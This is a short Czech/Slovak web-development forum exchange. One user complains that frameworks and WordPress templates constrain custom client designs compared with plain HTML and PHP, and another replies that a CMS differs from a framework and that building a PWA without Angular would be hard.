Kdyby jeden, dva... :D Hele ja vyrabim takove mini web apky namiru. A hodne lidi si vzdy vymysli design p*covinky. Si treba predstav kdyby se nasadil wordpress kde ta sablona te hodne omezuje co muzes a nemuzes nastylovat, Ano muzes to hadrcore pepsat v css, ale pristi update ti to smaze. Samozrejme framework uplne primarne neresi design, ale je to hodne podobne. Mas hodne specificke pozadavky zakazniku a framework ti na jednu stranu praci uhledci a na druhou stranu vis jak by jsi to krasene napsal v HTML a odchytil cistym phpkem a zpracoval formular tak jak si ho dementne zakaznik navrhl. Misto toho travis hodinu googlenim jak ve frameworku neco ohnout :D

Edited by ATomas

Sdílet tento příspěvek


Link to post
Share on other sites
před 2 hodinami, ATomas said:

Kdyby jeden, dva... :D Hele ja vyrabim takove mini web apky namiru. A hodne lidi si vzdy vymysli design p*covinky. Si treba predstav kdyby se nasadil wordpress kde ta sablona te hodne omezuje co muzes a nemuzes nastylovat, Ano muzes to hadrcore pepsat v css, ale pristi update ti to smaze. Samozrejme framework uplne primarne neresi design, ale je to hodne podobne. Mas hodne specificke pozadavky zakazniku a framework ti na jednu stranu praci uhledci a na druhou stranu vis jak by jsi to krasene napsal v HTML a odchytil cistym phpkem a zpracoval formular tak jak si ho dementne zakaznik navrhl. Misto toho travis hodinu googlenim jak ve frameworku neco ohnout :D

Tak je rozdiel medzi CMS systemom a frameworkom. Neviem si predstavit, ako by som mal spravit napr. PWA appku, ktora sa raz nacita a potom komunikuje iba cez ajax bez Angularu. 

Sdílet tento příspěvek


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×
×
  • Create New...